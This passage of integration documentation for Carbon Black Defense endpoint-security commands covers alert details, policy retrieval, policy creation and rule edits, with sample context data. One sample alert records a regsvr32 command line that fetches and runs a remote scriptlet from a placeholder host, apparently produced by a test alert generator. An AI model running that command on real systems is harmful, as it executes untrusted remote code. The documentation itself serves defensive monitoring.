Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Human Readable Output
ApplicationName ApplicationPath NumEvents PrivatePid ProcessId Sha256Hash
Google Chrome /Applications/Google Chrome.app/Contents/MacOS/Google Chrome 3580 81577-1533502547808-202 81577 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
cloud-drive-ui /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui 2038 1071-1533502548722-245 1071 f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b

Get alert details


Returns the details of a specified alert.

Base Command

cbd-get-alert-details

Input
Parameter Description
alertId Alert ID

Context Output
Path Description
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType Device type
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group Group
CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId Group ID
CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime Registered time
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId Device ID
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName Device name
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status Status
CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion OS version
CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion Sensor version
CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName User name
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance Importance
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message Message
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success Success
CarbonBlackDefense.GetAlertDetails.Events.ParentHash Parent hash
CarbonBlackDefense.GetAlertDetails.Events.PolicyState Policy state
CarbonBlackDefense.GetAlertDetails.Events.LongDescription Long description
CarbonBlackDefense.GetAlertDetails.Events.ParentPid Parent PID
CarbonBlackDefense.GetAlertDetails.Events.ProcessId Process ID
CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators Threat indicators
CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath Application path
CarbonBlackDefense.GetAlertDetails.Events.ProcessHash Process hash
CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash Process MD5 hash
CarbonBlackDefense.GetAlertDetails.Events.EventId Event ID
CarbonBlackDefense.GetAlertDetails.Events.EventTime Event time
CarbonBlackDefense.GetAlertDetails.Events.EventType Event type
CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus Kill chain status
CarbonBlackDefense.GetAlertDetails.Events.ParentName Parent name
CarbonBlackDefense.GetAlertDetails.Events.ParentPPid ParentP PID
CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid ProcessP PID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId Incident ID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName Application name
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName Indicator name
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash SHA-256 hash
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary Summary
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId Threat ID
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore Threat score
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time Time

Command Example

!cbd-get-alert-details alertId=HWOXYQ6P

Context Example
Account:{} 2 items
CarbonBlackDefense:{} 2 items
GetAlertDetails:{} 1 item
DeviceInfo:{} 4 items
DeviceInfo:{} 13 items
DeviceName:ECIADWS7
Success:true
Message:success
RegisteredTime:1525879595477
DeviceType:WINDOWS
DeviceId:896327
Status:REGISTERED
OsVersion:Windows 7 x86 SP: 1
Importance:MEDIUM
UserName:EVILCORP\Expel
GroupId:0
SensorVersion:3.1.0.100
Group:null
Events:{} 17 items
OrgId:1105
ThreatInfo:{} 6 items
IncidentId:HWOXYQ6P
Indicators:{} 3 items
ApplicationName:[] 64 items
IndicatorName:[] 64 items
Sha256Hash:[] 64 items
Summary:The application regsvr32.exe is executing an encoded fileless script.
ThreatId:218c1859d76eb42113590f9da21e2cec
ThreatScore:5
Time:1533253999790
GetProcesses:[] 3 items
0:{} 6 items
ApplicationName:Google Chrome
ApplicationPath:/Applications/Google Chrome.app/Contents/MacOS/Google Chrome
NumEvents:3580
PrivatePid:81577-1533502547808-202
ProcessId:81577
Sha256Hash:19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d
1:{} 6 items
ApplicationName:cloud-drive-ui
ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui
NumEvents:2038
PrivatePid:1071-1533502548722-245
ProcessId:1071
Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b
2:{} 1 item
TotalResults:2
Endpoint:{} 2 items
Hostname:ECIADWS7
OS:WINDOWS
Process:{} 7 items
CommandLine:regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
Endpoint:ECIADWS7
MD5:432be6cf7311062633459eef6b242fb5
PID:12804
ParentID:10808
ParentName:alert_generator.bat
Path:C:\Windows\System32\regsvr32.exe

Get all policy details.


Returns the details of all policies. the details

Base Command

cbd-get-policies

Input

There is no input for this command.

Context Output
Path Description
CarbonBlackDefense.GetPolicies.Id The policy ID
CarbonBlackDefense.GetPolicies.PriorityLevel The policy's priority level
CarbonBlackDefense.GetPolicies.SystemPolicy System policy ( boolean )
CarbonBlackDefense.GetPolicies.LatestRevision The policy's latest revision
CarbonBlackDefense.GetPolicies.Policy The policy object

Command Example

!cbd-get-policies

Context Example
CarbonBlackDefense:{} 1 item
GetPolicies:[] 40 items
0:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true

Get the details of a specified policy


Returns the details of a specified policy.

Base Command

cbd-get-policy

Input
Parameter Description
policyId Policy ID

Context Output
Path Description
CarbonBlackDefense.GetPolicy.Id The policy ID
CarbonBlackDefense.GetPolicy.PriorityLevel The policy's priority level
CarbonBlackDefense.GetPolicy.SystemPolicy System policy ( boolean )
CarbonBlackDefense.GetPolicy.LatestRevision The policy's latest revision
CarbonBlackDefense.GetPolicy.Policy The policy object

Command Example

!cbd-get-policy policyId=6525

Context Example
CarbonBlackDefense:{} 1 item
GetPolicy:{} 5 items
Id:6525
LatestRevision:1488926710902
Policy:{} 6 items
avSettings:{} 6 items
apc:{} 4 items
enabled:false
maxExeDelay:45
maxFileSize:4
riskLevel:4
features:[] 3 items
0:{} 2 items
enabled:false
name:SIGNATURE_UPDATE
1:{} 2 items
enabled:false
name:ONACCESS_SCAN
2:{} 2 items
enabled:true
name:ONDEMAND_SCAN
onAccessScan:{} 1 item
profile:NORMAL
onDemandScan:{} 4 items
profile:NORMAL
scanCdDvd:AUTOSCAN
scanUsb:AUTOSCAN
schedule:{} 4 items
days:null
rangeHours:0
recoveryScanIfMissed:true
startHour:0
signatureUpdate:{} 1 item
schedule:{} 3 items
fullIntervalHours:0
initialRandomDelayHours:4
intervalHours:4
updateServers:{} 2 items
servers:[] 1 item
0:{} 3 items
flags:0
regId:null
server:[] 1 item
0:http://updates.cdc.carbonblack.io/update
serversForOffSiteDevices:[] 1 item
0:http://updates.cdc.carbonblack.io/update
directoryActionRules:[] 0 items
id:-1
knownBadHashAutoDeleteDelayMs:null
rules:[] 0 items
sensorSettings:[] 24 items
0:{} 2 items
name:ALLOW_UNINSTALL
value:true
1:{} 2 items
name:ALLOW_UPLOADS
value:false
2:{} 2 items
name:SHOW_UI
value:false
3:{} 2 items
name:ENABLE_THREAT_SHARING
value:true
4:{} 2 items
name:QUARANTINE_DEVICE
value:false
5:{} 2 items
name:LOGGING_LEVEL
value:NORMAL
6:{} 2 items
name:QUARANTINE_DEVICE_MESSAGE
value:Your device has been quarantined. Please contact your administrator.
7:{} 2 items
name:SET_SENSOR_MODE
value:0
8:{} 2 items
name:SENSOR_RESET
value:0
9:{} 2 items
name:BACKGROUND_SCAN
value:false
10:{} 2 items
name:POLICY_ACTION_OVERRIDE
value:true
11:{} 2 items
name:HELP_MESSAGE
value:
12:{} 2 items
name:PRESERVE_SYSTEM_MEMORY_SCAN
value:false
13:{} 2 items
name:HASH_MD5
value:false
14:{} 2 items
name:SCAN_LARGE_FILE_READ
value:false
15:{} 2 items
name:SCAN_EXECUTE_ON_NETWORK_DRIVE
value:false
16:{} 2 items
name:DELAY_EXECUTE
value:false
17:{} 2 items
name:SCAN_NETWORK_DRIVE
value:false
18:{} 2 items
name:BYPASS_AFTER_LOGIN_MINS
value:0
19:{} 2 items
name:BYPASS_AFTER_RESTART_MINS
value:0
20:{} 2 items
name:SHOW_FULL_UI
value:false
21:{} 2 items
name:SECURITY_CENTER_OPT
value:false
22:{} 2 items
name:CB_LIVE_RESPONSE
value:false
23:{} 2 items
name:UNINSTALL_CODE
value:false
PriorityLevel:MEDIUM
SystemPolicy:true
Human Readable Output
Id 6525
LatestRevision 1488926710902
Policy {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]}
PriorityLevel MEDIUM
SystemPolicy true

Create a policy


Creates a policy, as prescribed by further input.

Base Command

cbd-create-policy

Input
Parameter Description
description Policy description
name A single line name for the policy
priorityLevel Priority score associated with sensors assigned to this policy
policy

JSON object containing the policy details.

Make sure a valid policy object is passed:

  1. Use the get-policy command to retrieve a similar policy object.
  2. Use the set-policy command to re-set some of the policy's fields.
  3. Use the modified object.

Context Output
Path Description
CarbonBlackDefense.CreatePolicy.PolicyId The new policy ID

Command Example

!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={ "policyInfo": { "description": "test policy for documentation", "name": "documentation test", "policy": { "avSettings": { "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 }, "features": [ { "enabled": false, "name": "SIGNATURE_UPDATE" }, { "enabled": true, "name": "ONACCESS_SCAN" }, { "enabled": true, "name": "ONDEMAND_SCAN" } ], "onAccessScan": { "profile": "NORMAL" }, "onDemandScan": { "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN", "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 } }, "signatureUpdate": { "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 2 } }, "updateServers": { "servers": [ { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] } ], "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ] } }, "directoryActionRules": [ { "actions": { "FILE_UPLOAD": false, "PROTECTION": false }, "path": "C:\\FXCM\\**" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "sadf" }, { "actions": { "FILE_UPLOAD": true, "PROTECTION": false }, "path": "/Users/**" } ], "id": -1, "rules": [ { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 1, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "COMPANY_BLACK_LIST" }, "id": 2, "operation": "RUN", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 3, "operation": "NETWORK", "required": false }, { "action": "TERMINATE", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 5, "operation": "RANSOM", "required": false }, { "action": "IGNORE", "application": { "type": "NAME_PATH", "value": "**\\devenv.exe" }, "id": 4, "operation": "RANSOM", "required": false }, { "action": "DENY", "application": { "type": "NAME_PATH", "value": "%SystemDrive%\\Windows\\System32\\notepad2.exe" }, "id": 10, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 11, "operation": "RANSOM", "required": true }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 13, "operation": "MEMORY_SCRAPE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 14, "operation": "CODE_INJECTION", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 15, "operation": "RUN_INMEMORY_CODE", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 17, "operation": "POL_INVOKE_NOT_TRUSTED", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 18, "operation": "INVOKE_CMD_INTERPRETER", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "KNOWN_MALWARE" }, "id": 20, "operation": "INVOKE_SCRIPT", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "RESOLVING" }, "id": 22, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "PUP" }, "id": 23, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "SUSPECT_MALWARE" }, "id": 24, "operation": "RUN", "required": false }, { "action": "DENY", "application": { "type": "REPUTATION", "value": "ADAPTIVE_WHITE_LIST" }, "id": 25, "operation": "NETWORK", "required": false }, { "action": "ALLOW", "application": { "type": "NAME_PATH", "value": "c:\\test\\**" }, "id": 26, "operation": "INVOKE_SCRIPT", "required": false } ], "sensorSettings": [ { "name": "SHOW_UI", "value": "true" }, { "name": "BACKGROUND_SCAN", "value": "true" }, { "name": "POLICY_ACTION_OVERRIDE", "value": "true" }, { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined by your computer administrator." }, { "name": "LOGGING_LEVEL", "value": "false" }, { "name": "ALLOW_UNINSTALL", "value": "true" }, { "name": "QUARANTINE_DEVICE", "value": "false" }, { "name": "RATE_LIMIT", "value": "0" }, { "name": "CONNECTION_LIMIT", "value": "0" }, { "name": "QUEUE_SIZE", "value": "100" }, { "name": "LEARNING_MODE", "value": "0" }, { "name": "SCAN_NETWORK_DRIVE", "value": "true" }, { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" }, { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" }, { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "true" }, { "name": "DELAY_EXECUTE", "value": "true" }, { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" }, { "name": "HASH_MD5", "value": "false" }, { "name": "SCAN_LARGE_FILE_READ", "value": "false" }, { "name": "SHOW_FULL_UI", "value": "true" }, { "name": "HELP_MESSAGE", "value": "CarbonBlack" }, { "name": "SECURITY_CENTER_OPT", "value": "true" }, { "name": "CB_LIVE_RESPONSE", "value": "true" }, { "name": "UNINSTALL_CODE", "value": "false" } ] }, "priorityLevel": "LOW", "version": 2 } }

Context Example
CarbonBlackDefense:{} 1 item
CreatePolicy:{} 1 item
PolicyId:21356
Human Readable Output
PolicyId 21356

Update a policy


Updates an existing policy.

Base Command

cbd-update-policy

Input
Parameter Description
description Policy description
name A single line name for the policy
priorityLevel Priority score associated with sensors assigned to this policy.
id

The ID of the policy to update.

policy

JSON object containing the policy details.

Make sure a valid policy object is passed:

  1. Use the get-policy command to retrieve a similar policy object.
  2. Use the set-policy command to re-set some of the policy's fields.
  3. Use the modified object.

Context Output

There is no context output for this command.

Command Example

!cbd-update-policy id=21355 priorityLevel=LOW description="woot" name="boot" policy={"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[],"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"value":"","name":"HELP_MESSAGE"},{"value":"false","name":"PRESERVE_SYSTEM_MEMORY_SCAN"},{"value":"false","name":"HASH_MD5"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHOW_FULL_UI","value":"false"},{"name":"SECURITY_CENTER_OPT","value":"false"},{"name":"CB_LIVE_RESPONSE","value":"false"},{"name":"UNINSTALL_CODE","value":"false"}],"avSettings":{"signatureUpdate":{"schedule":{"initialRandomDelayHours":4,"fullIntervalHours":0,"intervalHours":4}},"features":[{"enabled":false,"name":"SIGNATURE_UPDATE"},{"enabled":false,"name":"ONACCESS_SCAN"},{"name":"ONDEMAND_SCAN","enabled":true}],"updateServers":{"servers":[{"flags":0,"regId":null,"server":["http://updates.cdc.carbonblack.io/update"]}],"serversForOffSiteDevices":["http://updates.cdc.carbonblack.io/update"]},"apc":{"maxExeDelay":45,"riskLevel":4,"enabled":false,"maxFileSize":4},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"startHour":0,"recoveryScanIfMissed":true,"days":null,"rangeHours":0}}}}

Human Readable Output
Request Success

Delete a policy


Deletes a specified policy.

Base Command

cbd-delete-policy

Input
Parameter Description
policyId Policy ID

Context Output

There is no context output for this command.

Human Readable Output
Request Success

Add a rule to a policy


Adds a specified rule to a specified policy.

Base Command

cbd-add-rule-to-policy

Input
Parameter Description
action Rule action
operation Rule operation
required Rule required
id Rule ID
type Application type
value Application value
policyId Policy ID

Context Output

There is no context output for this command.

Command Example

!cbd-add-rule-to-policy action="TERMINATE" id="7777" operation="RANSOM" required="false" type="REPUTATION" policyId="21355" value="COMPANY_BLACK_LIST"

Human Readable Output
Request Success

Delete a rule from a policy


Deletes a specified rule from a specified policy.

Base Command

cbd-delete-rule-from-policy

Input
Parameter Description
policyId ID of the policy to delete the rule from
ruleId ID of the rule to delete

Context Output

There is no context output for this command.

Command Example

!cbd-delete-rule-from-policy ruleId=2 policyId=21355

Human Readable Output
Request Success

Update a rule in a policy


Updates a rule in a specified policy.

Base Command

cbd-update-rule-in-policy

Input
Parameter Description
action Rule action
operation Rule operation
required Rule required
id Rule ID
type Application type
value Application value
policyId Policy ID

Context Output

There is no context output for this command.

Command Example

!cbd-update-rule-in-policy action="TERMINATE" id=1 operation=RANSOM policyId=21355 required=false type=REPUTATION value=COMPANY_BLACK_LIST

Human Readable Output
Request Success

Set a policy


Sets a specified policy.

Base Command

cbd-set-policy

Input
Parameter Description
keyValue

A JSON object that holds key-value pairs. Key is the field path in the policy object to update with value.

policy

The policy to set.

Context Output

There is no context output for this command.